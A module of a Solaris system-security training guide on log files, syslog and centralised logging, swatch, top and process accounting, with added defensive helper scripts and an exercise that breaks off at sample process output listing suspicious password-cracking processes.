● Garfinkel, Simson, and Gene Spafford. Practical UNIX & Internet Security. O’Reilly & Associates, Inc. 1996.

● Frisch, Aeleen. System Administration. 2nd Ed, O’Reilly & Associates, Inc. 1995.

● Winsor, Janice. Solaris™ System Administrator's Guide. 3rd Ed, Prentice Hall. 2000.

● Gregory, Peter H. Solaris Security. Prentice Hall. 1999.

Tool Downloads

● swatch online resources [ftp://ftp.stanford.edu/general/security-tools/swatch/]

● top ported to Solaris OE 2.x [http://www.sunfreeware.com]

● top online resources [http://www.groupsys.com/top]


Solaris OE Logging Files

As a Solaris OE system administrator, you monitor the standard log files and use programs to provide snapshots of system activity.

Before you look at individual log files, the following hints might help you manage log files:

● Back up or copy log files on a regular, preferably daily, basis.

● Reset the size of log files to zero after a backup to prevent log files from becoming unmanageable and to reduce the risk of running out of disk space.

● Review the log files regularly. Logging is pointless if nobody reads the logs.

● Use filters to manage the amount of data to review. However, periodically review the entire log to ensure that nothing important is being missed.

● Send log files to a separate, secure log host, by either copying the log files or sending the log messages to one or more designated hosts on the network. Additional information on configuring separate log hosts is provided in “Why Use Centralized Logging?” on page 2-13.

Most log files are text files that system programs write to. The following sections cover a few log files that you might find useful.


Using /var/adm/lastlog Files

The Solaris OE records each time a user logs in to the system, using /var/adm/lastlog files. The next time the user logs in, the time of the prior login is reported on the screen. Train users to check this information each time that they use the system and to report any discrepancy with their known prior login time.

Note – The /var/adm/lastlog file is not a text file and cannot be browsed using standard utilities. Displaying the last login information is a function of the Solaris OE accounting package covered in “The Solaris OE Accounting Package” on page 2-27.

A successful login erases all previous information. Therefore, if a user misses a suspicious login attempt when logging in, the information is lost. One way to prevent losing this information is to add an entry to root’s crontab file to copy the lastlog on a regular basis to another secure location.

Note – No utility exists in Solaris OE to read the contents of the /var/adm/lastlog file. A script that reads a lastlog file and prints out the information is available from the O’Reilly Web site at: ftp://ftp.ora.com/pub/examples/nutshell/prac_unix_internet_secur/
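The log-management hints at the start of this section (back up, then reset the log to zero) and the lastlog crontab copy just described can be served by one small script. The following is an added example and is not part of the SC-300 guide; the script path /usr/local/sbin/logtools.sh, the archive directory /var/log/archive and the crontab schedule are assumptions. It truncates a log in place rather than removing it, because syslogd keeps the file open and would otherwise keep writing into an unlinked inode, and it never truncates lastlog, which is indexed by UID.

```shell
#!/bin/sh
# Added example (not from the SC-300 guide). Two helpers that root's crontab
# can call; /var/log/archive and the script path are assumptions.
#
#   archive_log SRC DIR   copy SRC to DIR with a timestamp suffix (mode 0600)
#   rotate_log  SRC DIR   archive SRC, then truncate it to zero length
#
# Suggested crontab entries for root (assumed paths and times):
#   0 1 * * * /usr/local/sbin/logtools.sh archive /var/adm/lastlog  /var/log/archive
#   5 1 * * * /usr/local/sbin/logtools.sh rotate  /var/adm/messages /var/log/archive
#
# lastlog is only archived, never truncated: it is indexed by UID, so a
# zero-length copy would lose every user's last-login record.

archive_log() {
    src=$1
    dir=$2
    [ -f "$src" ] || { echo "archive_log: $src: no such file" >&2; return 1; }
    [ -d "$dir" ] || mkdir -p "$dir" || return 1
    chmod 700 "$dir"                      # archive readable by root only
    stamp=$(date +%Y%m%d%H%M%S)
    dest="$dir/$(basename "$src").$stamp"
    cp -p "$src" "$dest" || return 1      # -p keeps owner, mode and mtime
    chmod 600 "$dest"
    printf '%s\n' "$dest"                 # report where the copy went
}

rotate_log() {
    src=$1
    dir=$2
    dest=$(archive_log "$src" "$dir") || return 1
    # Refuse to truncate unless the copy has exactly the same size, so a
    # failed or partial copy never destroys the only record.
    [ "$(wc -c < "$src" | tr -d ' ')" -eq "$(wc -c < "$dest" | tr -d ' ')" ] \
        || { echo "rotate_log: size mismatch, $src left untouched" >&2; return 1; }
    : > "$src"          # truncate in place; syslogd's open descriptor stays valid
    printf '%s\n' "$dest"
}

# Command-line dispatcher so the same file works from crontab.
case ${1:-} in
    archive) archive_log "$2" "$3" ;;
    rotate)  rotate_log  "$2" "$3" ;;
esac
```

Both functions print the path of the copy they made, so the crontab mail shows exactly which archive holds each day's data.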

Using /var/adm/loginlog Files

The loginlog file records unsuccessful login attempts, but only after five consecutive failures. This file is useful only to track repeated login attempts – most hackers have more subtle ways of attacking your system.

Note – The /var/adm/loginlog file is not created when installing the Solaris OE and you must create it before login failures can be recorded. This file does not record login failures from the CDE dtlogin program.

Using utmpx and wtmpx Log Files

The utmpx and wtmpx files store information about who is currently logged in to the system.

The /var/adm/utmpx file replaces the old /etc/utmp file. It provides information similar to the lastlog file, but stores information only on users currently logged into the system.

The /var/adm/wtmpx file stores information every time users log in and when they log out. It extends the information stored in the /etc/wtmp file by recording the type of connection and the remote host name for logins over the network.

The Solaris OE programs that report on users currently logged in (for example who, whodo, w, users, and finger) obtain their information from the utmpx file. The last program reads the wtmpx file to create a report of the most recent user logins.

Note – When a user uses the su command to become another user and changes the real and effective user ID (UID), their entry in the utmpx file is not altered. This can confuse programs that obtain a user’s identity from the utmpx file.

Using the sulog File

The sulog file is specific to the su program. It records all attempts that users make to change their identity to that of another user. You can define parameters in the file /etc/default/su to specify the location of the sulog file and to specify whether attempts to use the su command to change to root are logged on the console (this is the default setting).

You should monitor the sulog file to see whether users are attempting to use the su command to change to root. However, after successfully hacking into the root account, a hacker is likely to edit or remove the sulog file. One way to prevent possible loss of the sulog file is to send each entry logged to the sulog file to a printer to create a hardcopy or to send each entry to a remote logging daemon across the network.

Using /var/adm/messages Files

In the Solaris OE default configuration, all messages sent to the console are also stored in the /var/adm/messages file. This provides a more permanent record for messages that might otherwise be lost.

The System Logging Facility

The System Logging Facility (Syslog) is a host-configurable, uniform system logging facility. Before Syslog was developed, each utility that required logging created and managed its own individual log files. During the development of Berkeley UNIX, the system logging facility daemon, syslogd, was developed to simplify and centralize the maintenance and evaluation of logged data. The Syslog utility uses a set of standard library functions to pass status messages and other logged information to the syslogd process.

Configuring the Syslog Utility

One advantage of the Syslog utility is that application programmers can use Syslog to send notification messages without creating log files. Each message consists of four parts:

● Program name – A short text name for the program, such as make or gcc (usually the name of an executable program).

● Facility – A category of program generating the message.

● Priority – Defines the priority level for the message.

● Message text – The message itself.

The facility defines the type of program generating the message, as shown in Table 2-1.

Priorities range from debug to emerg (emergency), as shown in Table 2-2. A special priority of none in the configuration file indicates that the message should be ignored. Specifying a low priority level automatically includes the higher levels for the same facility.

Note – These priorities are only labels. One programmer’s emergency might be another’s warning.

Table 2-1 Syslog Facility Values

Program Type   Description
kern           Kernel
user           User process
mark           Time stamp
auth           Authorization programs (for example, login, su, getty)
daemon         Network daemons (for example, inetd, ftpd)
*              All facilities

Table 2-2 Syslog Priority Levels, in Descending Order

Priority   Description
emerg      For panic conditions normally broadcast to all users
alert      For conditions that need immediate correction
crit       For critical condition warnings
err        For other errors
warning    For warning messages
notice     For non-error conditions that might require action
info       Informational messages
debug      Used when debugging daemons and so on
none       Blocks messages from the named facility

The configuration file, /etc/syslog.conf, controls where messages are logged. Each line of the configuration file consists of a selector, which specifies which message to log, and an action field that specifies what to do with the message.

● The selector has the format: facility.priority.

● The action field causes Syslog to do one of the following:

● Append the messages, with a time stamp, to a specified log file or device. The log file or device name must be a fully qualified path name starting with a forward slash.

● Forward the messages to users using the write utility. If the user is not logged in, the message is lost. You can separate multiple user names with commas. An asterisk indicates that the message should be written to all logged-in users.

● Forward the messages to the syslogd daemon of another network host. The host is specified after the “@” symbol (for example, @netlog.sun.com).

An example /etc/syslog.conf file is shown in Code 2-1.

Code 2-1 Example /etc/syslog.conf Configuration File

*.err;kern.*;mark.*;auth.notice	/dev/console
daemon.*;auth.notice	/var/adm/messages
auth.warn	root
auth.warn	/dev/lp0
*.emerg	*

Note – The white space between the selector field and the action field must be one or more tab characters. Using spaces instead of tabs causes the Syslog utility to ignore the action.

You must turn on Syslog logging in some programs:

● Set SYSLOG=YES in the /etc/default/login file to log all root logins (such as auth.notice) and multiple failed login attempts (such as auth.crit).

● Set SYSLOG_FAILED_LOGINS=0 in the /etc/default/login file to log all failed login attempts. The default only logs after five failed attempts.

● Set SYSLOG=YES in the /etc/default/su file to log all attempts to use the su command to change to the root user. Every such use is logged at syslog level auth.info, and all failed su command attempts are logged at syslog level auth.crit.

Caution – Anyone can use the Syslog utility to generate log entries. Be aware that false information might be written to your log files.

Why Use Centralized Logging?

The default /etc/syslog.conf file keeps all messages on the local host. This might be adequate in a small environment, but managing numerous log files from multiple hosts can become difficult on a large network. You can configure the syslogd daemon to automatically send log data to a central syslogd server. Advantages of centralized logging include:

● Complex problems involving multiple systems can be easier to troubleshoot because all the error information is on one server instead of several servers.

● One log server is easier to manage if your site requires rotation and tape backup of the system logs.

● Centralized, real-time log monitoring allows proactive problem solving rather than reactive “fire fighting.”

● Hackers that successfully break in to one system cannot edit the log files to hide their success unless they break in to the logging host as well.

When configuring a central log host, consider the following issues:

● The data is usually sent in plain text, which allows an attacker with access to the network to use network sniffing tools that view and identify data as it is transferred.

● One centralized log server is a single point of failure in the system. Therefore, it is a good idea to log events from all systems on multiple log servers.

● Multiple centralized log servers make it more difficult for hackers to hide their tracks but also add complexity to the logging system.

Configuring and Debugging Logging to Remote Hosts

You can have all your systems send the messages to one central host. Even though this method is easy to administer, it creates a single point of failure. The syntax for the /etc/syslog.conf file allows a logging host to be specified, as follows:

auth.notice	@loghost

If multiple logging hosts are required, then multiple lines must be provided:

auth.notice	@loghost1
auth.notice	@loghost2

This solution adds to overall security. Even if someone breaks into one system and erases its log files, you still have another copy.

The code for the syslogd daemon can be compiled on a non-UNIX host that has standard C and TCP/IP libraries. If you log to a PC with Syslog as its only network service, there is no way for someone to break in from the Internet and alter the logs.
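The two failure modes described above, spaces instead of tabs (syslogd silently drops the action) and a single remote log host (a single point of failure), can both be caught before a configuration is pushed out. The following checker is an added example, not part of the SC-300 guide or of Solaris; it accepts the facility and priority names from Tables 2-1 and 2-2 plus the other standard syslog facilities, and the configuration files in the usage note are constructed.

```shell
#!/bin/sh
# Added example (not from the SC-300 guide): sanity-check an /etc/syslog.conf.
#   check_syslog_conf FILE
# Reports, per line: selector and action not separated by a tab (syslogd
# would ignore the action), unknown facility or priority names, and
# unrecognised actions. Warns when fewer than two remote log hosts (@host)
# are configured. Exit status is 1 when any error was found.
check_syslog_conf() {
    awk '
    BEGIN {
        # Facilities from Table 2-1 plus the other standard syslog facilities.
        nfac = split("kern user mail daemon auth syslog lpr news uucp cron mark local0 local1 local2 local3 local4 local5 local6 local7 *", f, " ")
        for (i = 1; i <= nfac; i++) fac[f[i]] = 1
        # Priorities from Table 2-2; "*" selects all of them.
        npri = split("emerg alert crit err warning notice info debug none *", p, " ")
        for (i = 1; i <= npri; i++) pri[p[i]] = 1
        errors = 0; remote = 0; hosts = ""
    }
    /^[ \t]*#/ || /^[ \t]*$/ { next }          # comments and blank lines
    {
        if ($0 !~ /\t/) {
            printf("line %d: no tab between selector and action (spaces are ignored by syslogd)\n", NR)
            errors++; next
        }
        sel = $0; sub(/\t.*$/, "", sel)          # text before the first tab
        act = $0; sub(/^[^\t]*\t+/, "", act)     # text after the tab run
        if (sel ~ / /) {
            printf("line %d: selector contains a space: %s\n", NR, sel); errors++
            gsub(/ /, "", sel)
        }
        n = split(sel, parts, ";")               # selectors may be joined with ;
        for (i = 1; i <= n; i++) {
            if (split(parts[i], fp, ".") != 2 || !(fp[1] in fac) || !(fp[2] in pri)) {
                printf("line %d: unknown selector %s\n", NR, parts[i]); errors++
            }
        }
        if (act ~ /^@/) {                        # forward to another syslogd
            remote++
            sep = (hosts == "") ? "" : " "
            hosts = hosts sep substr(act, 2)
        } else if (act !~ /^\// && act != "*" && act !~ /^[A-Za-z_][A-Za-z0-9_,]*$/) {
            # not a path or device, not "all users", not a user list
            printf("line %d: unrecognised action %s\n", NR, act); errors++
        }
    }
    END {
        if (remote == 0) printf("warning: no remote log host configured\n")
        else if (remote == 1) printf("warning: only one remote log host (%s), a single point of failure\n", hosts)
        printf("%d error(s)\n", errors)
        exit(errors > 0)
    }' "$1"
}
```

Run against a constructed file containing the weak form "auth.warn root" (space-separated) and a single "@loghost" line, the checker reports the missing tab and the single-point-of-failure warning; the corrected form with tabs and two "@loghost1"/"@loghost2" lines passes with 0 errors.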

The logger Utility

A system administrator can use the logger utility to send entries to the syslogd daemon from the command line. For example, you might use the logger utility to record suspected intrusions when your suspicions are provoked.

You can change the facility and priority of the message from the default user.notice setting by using the -p option. Refer to the Solaris OE manual page for the full list of options (see “Additional Resources” on page 2-3).

The following example logs the message “System rebooted” to the system log at the default priority level user.notice:

# logger "System rebooted"

The next example logs the message “This is a test of the auth.notice level” to the system log at a priority of notice and a facility of auth:

# logger -p auth.notice "This is a test of auth.notice level"

Using the swatch Tool

The swatch tool is a freeware log monitoring tool developed at Stanford University. The swatch tool monitors log files. The tool can filter out unwanted data and can take one or more user-specified actions (for example, send mail or execute a script) based upon patterns in the log. The swatch tool is written in the Perl programming language and uses Perl syntax in its configuration file.

You can run the swatch tool in three different ways:

● Make a single pass through a file

● Look at messages being appended to a file as that file is updated

● Examine the standard output of a program

To use the swatch tool to continuously monitor a log file, specify the log file on the command line:

# swatch -t /var/adm/messages

The swatch tool monitors the log file (much like tail -f) and looks for the types of messages you define in the swatch configuration file. Typing swatch without any command line parameters has the same effect as using the tail command on the /var/adm/syslog file.

Configuring the swatch Tool

The swatch tool is controlled by a configuration file. The default location is $HOME/.swatchrc, but you can use a command line option to change the default. You can use the command line option to use different configuration files for different log files or when you run the swatch tool from the system initialization files in the /etc/init.d directory. For example:

# swatch -c /etc/swatch.sulog.conf -t /var/adm/sulog

Each non-comment line (comments start with the # symbol) defines either:

● A pattern expression to watch for, starting with the keyword watchfor

● Actions to be performed if the previous expression is matched; these lines must start with a tab character

● A pattern expression to ignore, starting with the keyword ignore

A watch or ignore pattern field is a comma-separated list of Perl regular expression patterns (similar to those used by the UNIX egrep program). The swatch tool builds up its rules in the order that they appear in the file, so you must place general rules before more specific ones. See the example swatch configuration file in Code 2-2 on page 2-21.

Using swatch Actions

Table 2-3 shows the actions understood by the swatch tool.

Table 2-3 The swatch Tool Actions

Action Usage

echo     Causes the log line to be echoed to the swatch tool’s controlling terminal or to the /dev/null file (if started from the system startup files in the /etc/init.d directory). The line can be echoed in different formats by adding one of the following keywords to the echo line: normal, bold, underscore, blinking, or inverse.
bell     Sends a bell signal (^G) to the controlling terminal.
ignore   Causes the swatch tool to ignore the current line of input and proceed to the next one. If used early in the configuration file, the ignore action can filter out specific, unimportant information that might otherwise match a more general expression found later in the configuration file.
write    Uses the write command to send a copy of the line to a user list.
mail     Uses the mail command to send a copy of the line to a user list.
pipe     Runs a user command with pattern matched lines as input to the particular command.
exec     Runs a command on the system. You can use selected fields from the matched line as arguments for the command. For example, use the exec action to invoke a script to send a pager message to a system administrator.

Code 2-2 shows an example swatch configuration file. Actions must follow the watchfor line, and must be indented with a tab character.

Code 2-2 Example swatch Configuration File

# Swatch configuration file
#
# Alert me of bad login attempts and find out who is on the system
#
watchfor /INVALID|REPEATED|INCOMPLETE/
	echo inverse
	bell
	write root
#
# Ignore this stuff
#
ignore /sendmail/,/nntp/,/xntp|ntpd/,/faxspooler/

Configuring the swatch tool requires some significant effort. Each log file to be monitored requires a separate swatch process (with its own configuration file). To save time, use the swatch tool in conjunction with the Syslog utility so that Syslog can collect all the necessary messages to a single log file.

The swatch tool allows you to configure many types of actions, such as sending copies of files and messages to a separate machine or paging a system administrator. However, to use the swatch tool, you must know the Perl patterns.
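To see how rule ordering and the ignore action interact, here is a small awk-based filter that reads a swatch-style configuration (watchfor and ignore lines with tab-indented action lines) and applies it to a log file, alerting on the first rule that matches each line. This is an added example; it is neither swatch itself nor code from the SC-300 guide. It honours only the egrep-style subset of Perl patterns (alternation with |, comma-separated /pattern/ lists) and reports the actions that would fire rather than executing them; the configuration and log lines in the usage note are constructed.

```shell
#!/bin/sh
# Added example (not swatch, not from the SC-300 guide): apply a swatch-style
# configuration to a log file and print which lines would trigger actions.
#   swatch_filter CONFIG LOGFILE
# Rules are applied in file order; the first rule whose pattern matches a
# line decides (ignore -> drop silently, watchfor -> alert with its actions).
# Patterns are treated as egrep-style regular expressions, so only the part
# of Perl syntax shared with egrep is honoured.
swatch_filter() {
    awk '
    FNR == NR {
        # First file: the configuration, read into ordered rule tables.
        if ($0 ~ /^[ \t]*#/ || $0 ~ /^[ \t]*$/) next
        if ($0 ~ /^\t/) {
            # Tab-indented line: an action belonging to the previous rule.
            if (nrules == 0) { print "config line " FNR ": action before any rule" > "/dev/stderr"; next }
            a = $0; sub(/^\t+/, "", a)
            sep = (actions[nrules] == "") ? "" : "; "
            actions[nrules] = actions[nrules] sep a
        } else if ($1 == "watchfor" || $1 == "ignore") {
            nrules++
            kind[nrules] = $1
            actions[nrules] = ""
            pat = $0; sub(/^[ \t]*(watchfor|ignore)[ \t]+/, "", pat)
            gsub("^/|/$", "", pat)           # strip the outer slashes
            gsub("/,/", "|", pat)            # /a/,/b/  ->  a|b
            regex[nrules] = pat
        } else {
            print "config line " FNR ": not understood: " $0 > "/dev/stderr"
        }
        next
    }
    {
        # Second file: the log. Stop at the first matching rule.
        for (i = 1; i <= nrules; i++) {
            if ($0 ~ regex[i]) {
                if (kind[i] == "watchfor") {
                    alerts++
                    printf("ALERT [%s]: %s\n", actions[i], $0)
                }
                break
            }
        }
    }
    END { printf("%d alert(s)\n", alerts + 0) }' "$1" "$2"
}
```

With the Code 2-2 rules, a constructed sendmail line that also contains REPEATED raises an alert, because the watchfor rule precedes the ignore rule; placing the ignore line first silently drops that line, which is the behaviour the ignore description in Table 2-3 relies on.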

The best way to use the swatch tool is to include it as part of the system initialization in the same directory as the system services, particularly network services (for example, /etc/rc2.d).

Code 2-3 shows a possible startup script.

Code 2-3 Example swatch Startup Script

#!/bin/sh
# startup swatch
case $1 in
start)
    /usr/local/bin/swatch -c /etc/swatch.sulog.conf \
        -t /var/adm/sulog &
    /usr/local/bin/swatch -c /etc/swatch.msg.conf \
        -t /var/adm/messages &
    ;;
stop)
    # terminates when TERM signal sent by shutdown
    ;;
esac

Solaris OE Monitoring Tools

The Solaris OE provides an array of system utilities designed for monitoring system processes and resources. You can also use these tools to detect security problems. Many of these tools have overlapping capabilities or perform similar operations. The commands and utilities presented are not comprehensive, but they are commonly used tools. When you have reviewed the available tools, you can select specific tools for particular tasks.

For more information about each of the commands and their possibleoptions, consult the appropriate Solaris OE manual pages.

Table 2-4 shows some of the utilities that monitor resources.

Caution – Allowing someone who has not logged in to your system (for example, someone logging in over the network) to run programs, such as who and finger, is a security risk. Information about user names can be used by a potential intruder as the basis for an attack on your system.

As the system administrator in charge of security, you should run these commands on a regular basis to monitor user activity.

Caution – All these commands can be modified by an experienced intruder. For example, who and finger use the /var/adm/utmpx file, which should be protected from user modification. Also, a process argument list can be modified to disguise its name and command line parameters, which can change the information displayed by the ps command.

Table 2-4 Solaris OE Tools

Tool        Description
who         Displays who is on the system
whodo       Displays who is doing what on the system
w           Displays who is on the system and what they are doing
last        Displays user login and logout information
finger      Displays information about local and remote users
ps          Reports process status
prstat      Continuously displays process information sorted by Central Processing Unit (CPU) utilization
sdtprocess  Displays process information which can be sorted in a number of different ways
kill        Terminates or signals a process
vmstat      Provides virtual memory statistics
sar         Reports on system activity

Process Monitoring Using the top Tool

The top tool is a program that provides continual reports on the state of the system. The top tool provides a list of the top CPU-using processes. The top tool’s primary design goals are to:

● Provide an accurate snapshot of the system and process state

● Not be one of the top processes

● Be as portable as possible

The top tool includes an installation configuration script called Configure, which must be run before compiling the top tool. The Configure script helps choose the correct installation parameters. You can also obtain the top tool precompiled from the Sun Freeware Web site (see “Additional Resources” on page 2-3), which avoids the need to modify the Configure script.

The top tool provides a list of the top CPU-using processes, as shown in Code 2-4.

Code 2-4 Example top Output

last pid:   375;  load averages:  0.51,  0.54,  0.24                  11:53:56
39 processes:  38 sleeping, 1 on cpu
CPU states: 99.0% idle,  0.4% user,  0.2% kernel,  0.4% iowait,  0.0% swap
Memory: 256M real, 183M free, 28M swap in use, 679M swap free

  PID USERNAME THR PRI NICE  SIZE   RES STATE   TIME    CPU COMMAND
  368 root       1  48    0 1824K 1144K cpu     0:00  1.24% ksh
  340 root       1  59    0   17M 9656K sleep   0:01  0.18% Xsun
  259 root       6   0    0 2648K 1968K sleep   0:01  0.08% vold
  356 root       4  59    0 7776K 4920K sleep   0:00  0.08% dtgreet
  366 root       1  54    0 1760K 1272K sleep   0:00  0.04% in.telnetd
  202 root       8  43    0 3480K 1776K sleep   0:00  0.03% syslogd
  375 root       1  50    0 2520K 1576K sleep   0:00  0.03% top
  278 daemon     4  58    0   10M 5288K sleep   0:00  0.02% dwhttpd
  363 root       1  58    0 1592K  824K sleep   0:00  0.02% in.comsat
  177 root       1  45    0 2648K 1912K sleep   0:00  0.02% inetd
  342 root      17  58    0 2424K 1952K sleep   0:00  0.02% mibiisa
  341 root       4  51    0 5128K 2520K sleep   0:00  0.01% dtlogin
    1 root       1  58    0  776K  312K sleep   0:00  0.01% init
  325 root       7  44    0 3256K 2024K sleep   0:00  0.01% dmispd
  327 root       3  48    0 4920K 2056K sleep   0:00  0.01% dtlogin

Note – The top tool requires read access to all files in the /proc directory, the memory files /dev/kmem and /dev/mem, and the system image /vmunix. This means that the top tool must be installed with the setuid set to root or only be executable by the root user.

For more information on the top tool, go to: http://www.groupsys.com/top

The Solaris OE Accounting Package

The Solaris OE accounting package is a suite of programs developed to provide information about system use, which allows users to be billed for the amount of system resources they use. Solaris OE accounting consists of programs and shell scripts that collect data about system use. Solaris OE accounting also provides several analysis reports.

From a security standpoint, the accounting package is another system monitoring tool. Only those aspects of accounting which pertain to security are covered in this module. Refer to the Solaris OE manual pages if you want to use these facilities for billing purposes.

Why Use the Accounting Package?

The accounting package helps system administrators with the following functions:

● Monitoring system usage

● Troubleshooting

● Monitoring system capacity and performance

● Ensuring data security

The accounting package produces a number of data collection, summary, and report files. You can review these files just like other system log files. Not all files are in plain text, but programs supplied with the accounting package can format data files and produce reports (see “Accounting Programs” on page 2-30).

Process Accounting

Each time a program exits, the kernel’s accounting code places an entry in the /var/adm/pacct file. The entry contains the following information:

● User identifier (UID) and group identifier (GID)

● Process start and end times

● CPU time split between user and kernel space

● Amount of memory used

● Number of characters read and written

● Command name (eight characters)

● The process’s controlling terminal

Use this information to determine what commands a user has executed. You can use this information after a known attack to determine what the intruder was doing. You can also use this information to identify intrusions. For example, you might become suspicious if a user called uucp is running any command other than uucico.

You must be aware that process accounting only writes an entry to the file after a process exits. Long-running processes, such as password crackers, do not appear until they complete. This means that process accounting can only detect attacks after the event.

Caution – Process accounting is not auditing. Arguments to commands are not stored, so it is impossible to track what files or data might have been modified. Also, process accounting might record a user running vi, but you cannot determine whether the user is running the standard vi program or a different program renamed vi.
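The uucp/uucico rule given above can be turned into a small per-user policy check that runs over acctcom output from the nightly crontab. This is an added example, not part of the SC-300 guide or of the accounting package: the policy file format (a user name followed by a comma-separated list of permitted commands) is an assumption, and the acctcom report in the usage note is constructed in the column order acctcom prints (command name, user, terminal, start time, and so on). It strips the leading # that acctcom puts on a command executed with super-user privileges and reports that separately. The caveats just stated still apply: the command name is at most eight characters, arguments are not recorded, and a renamed binary looks like the command it pretends to be.

```shell
#!/bin/sh
# Added example (not from the SC-300 guide or the accounting package): flag
# pacct records where a restricted account ran something it should not.
#   check_acct_policy POLICY REPORT
# POLICY lines (assumed format):  user  cmd1,cmd2,...   (# starts a comment)
# REPORT is acctcom output: column 1 is the command name (prefixed with # when
# it ran with super-user privileges), column 2 the user, column 4 the start
# time. Exit status is 1 when anything was flagged, so cron mails the output.
check_acct_policy() {
    awk '
    FNR == NR {
        # First file: the policy. Only users listed here are restricted.
        if ($0 ~ /^[ \t]*#/ || NF < 2) next
        restricted[$1] = 1
        n = split($2, c, ",")
        for (i = 1; i <= n; i++) allowed[$1, c[i]] = 1
        next
    }
    # Second file: skip the two acctcom header lines.
    $1 == "COMMAND" || $1 == "NAME" { next }
    NF >= 2 {
        cmd = $1; user = $2
        priv = (substr(cmd, 1, 1) == "#")        # acctcom marks super-user runs with #
        if (priv) cmd = substr(cmd, 2)
        if ((user in restricted) && !((user, cmd) in allowed)) {
            flagged++
            note = priv ? " (with super-user privileges)" : ""
            printf("SUSPICIOUS: %s ran %s%s at %s\n", user, cmd, note, $4)
        }
    }
    END {
        printf("%d suspicious record(s)\n", flagged + 0)
        exit(flagged > 0)
    }' "$1" "$2"
}
```

A typical invocation is acctcom over yesterday's pacct file piped to a temporary file, then check_acct_policy run on it; with a policy of "uucp uucico,uuxqt" and a constructed report in which uucp ran uucico, sh and #su, the sh and su records are flagged and the function returns 1.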

Working With the Accounting Package

The accounting package contains programs that are usually run on a regular basis. These programs use information stored in various accounting files to generate reports and summaries.

Accounting Programs

Accounting programs are generally placed in an administrative crontab file. An example crontab entry is shown in “Setting Up Accounting” on page 2-35. A crontab entry summarizes and analyzes the collected data, then deletes the /var/adm/pacct file. Table 2-5 lists the accounting programs and their uses.

Table 2-5 Accounting Programs

Program Name  Description
ckpacct       Prevents excessive growth (more than 500 KB) of the /var/adm/pacct file to avoid unnecessarily high compute times during summarizing. Accounting is halted when free space drops below 500 KB in the /var/adm directory.
dodisk        Scans the disk and generates a summary of the disk space currently in use.
runacct       Summarizes the raw data collected over the day, deletes the raw data files, and calls the prdaily command to create a report of the previous day’s activities.
monacct       Generates an overall total from the day’s totals, and creates a summary report for the entire period. Additionally, the daily reports are deleted and the summary files reset to zero. As its name suggests, it is intended for monthly accounting but you can use other accounting periods.

The accounting suite includes several commands. The most useful (from a security standpoint) are shown in Table 2-6.

File Locations

The shell scripts and binaries are located in the /usr/lib/acct directory, and the data and report analyses are stored in the /var/adm/acct directory.

Table 2-6 Accounting Commands

Command    Description
lastlogin  Lists all known user names and the date when these users last logged in.
prdaily    Generates the daily report from the summaries created by the runacct and dodisk commands. The report is located in the /var/adm/acct/sum/rprtmmdd file, where mmdd are the month and the day of the report. Usually this command is run by the runacct command from crontab entries for the user administrator. See “Setting Up Accounting” on page 2-35.
acctcom    Takes input in the format found in the /var/adm/pacct file (or other process accounting files) and generates a report on standard output. You can use various options to format and summarize data.
lastcomm   Displays command execution information from the /var/adm/pacct file in reverse chronological order. You can use arguments to restrict the report to single users, commands, terminal lines, or between certain times.


Types of Accounting Files

Accounting maintains two types of files, collection and summary:

● Collection files – Files containing raw data that is appended by the current process or kernel. The collection files are:

● /var/adm/pacct – Contains an entry each time that a process terminates.

● /var/adm/wtmpx – Contains information on logins and logouts as well as boot operations and shutdowns.

● /var/adm/acct/nite/disktacct – Entries in disktacct are generated by dodisk.

● /var/adm/fee – Used by charging programs


● Summary files and report files – Many files that contain only summaries. Reports are created from the summary files. The summary and report directories are:

● /var/adm/acct/sum – Contains daily summary files and reports

● /var/adm/acct/fiscal – Contains monthly analyses and summary files


Setting Up Accounting

Accounting is installed with the standard Solaris OE installation. To ensure that it starts automatically at boot time, follow these steps:

1. Install the /etc/init.d/acct script as the start script at run level 2.

# ln /etc/init.d/acct /etc/rc2.d/S22acct

2. Install the /etc/init.d/acct script as the stop script at run level 0 (the commands below also install it at run levels 1 and S).

# ln /etc/init.d/acct /etc/rc0.d/K22acct
# ln /etc/init.d/acct /etc/rc1.d/K22acct
# ln /etc/init.d/acct /etc/rcS.d/K22acct


3. Modify the crontab files for users adm and root so that the dodisk, ckpacct, runacct, and monacct programs (if required) start automatically.

# crontab -l root
30 22 * * 4 /usr/lib/acct/dodisk
# crontab -l adm
0 * * * * /usr/lib/acct/ckpacct
30 2 * * * /usr/lib/acct/runacct 2> /var/adm/acct/nite/fd2log
30 7 1 * * /usr/lib/acct/monacct

4. Reboot the system or run the /etc/rc2.d/S22acct start program.


Starting and Stopping the Accounting Package

The init command should start the accounting package automatically. However, you can start the accounting package manually using the /usr/lib/acct/startup shell script.

When the accounting package is started, a new /var/adm/pacct file is created. The old file is renamed /var/adm/pacctN, where N is an integer that is incremented each time the pacct file is replaced.

Note – Accounting can consume vast amounts of disk space on busy systems. Make sure that adequate space is provided in the /var/adm directory and that the overnight batch programs described in “Accounting Programs” on page 2-30 are run to summarize data on a daily and monthly basis. Accounting switches off automatically if the /var/adm directory runs short of space.

You can stop the accounting package using the command:

/usr/lib/acct/shutacct ["reason for stopping"]

This command writes an entry (including the reason, if supplied) in the /var/adm/wtmpx file.


Exercise: Using Logging as a Security Tool

In this exercise, you complete the following tasks:

● Study standard log files and tool output looking for potential security issues

● Enable higher levels of logging for authorization activities

● Enable system accounting

Preparation

Ensure that you have installed the GNU C++ compiler and the make utility.

Tasks

The first two tasks ask you to look at log files to determine if there are any potential security problems. (Hint: Because this is a security course, you can expect there to be problems – the trick is to identify what the problems are.)

The remaining tasks ask you to add different levels of logging to your system. If you are not confident about what to do having studied the question and read the online manual pages, then step-by-step instructions are provided in the answers section at the end of this module.

You are not required to finish all of the tasks in the time allocated by the instructor.

Task – Sample sulog Commentary File

Study the sample /var/adm/sulog file on your system to identify possible security problems.


Task – Studying Processes

Look at the following output from the top command:

last pid: 668; load averages: 0.29, 0.07, 0.04                09:59:01
41 processes: 39 sleeping, 1 running, 1 on cpu
CPU states: 0.0% idle, 99.0% user, 1.0% kernel, 0.0% iowait, 0.0% swap
Memory: 256M real, 175M free, 34M swap in use, 672M swap free

  PID USERNAME THR PRI NICE  SIZE   RES STATE   TIME    CPU COMMAND
  667 root       1  40    0 6512K 6080K run     0:18 59.36% john
  668 root       1  58    0 2520K 1576K cpu     0:00  0.95% top
  480 root       1  58    0  976K  712K sleep   0:00  0.87% cracker
  367 root       1  48    0 1824K 1144K sleep   0:00  0.03% ksh
  378 root       1  48    0 1824K 1152K sleep   0:00  0.02% ksh
  341 root      12  58    0 2384K 1912K sleep   0:01  0.00% mibiisa
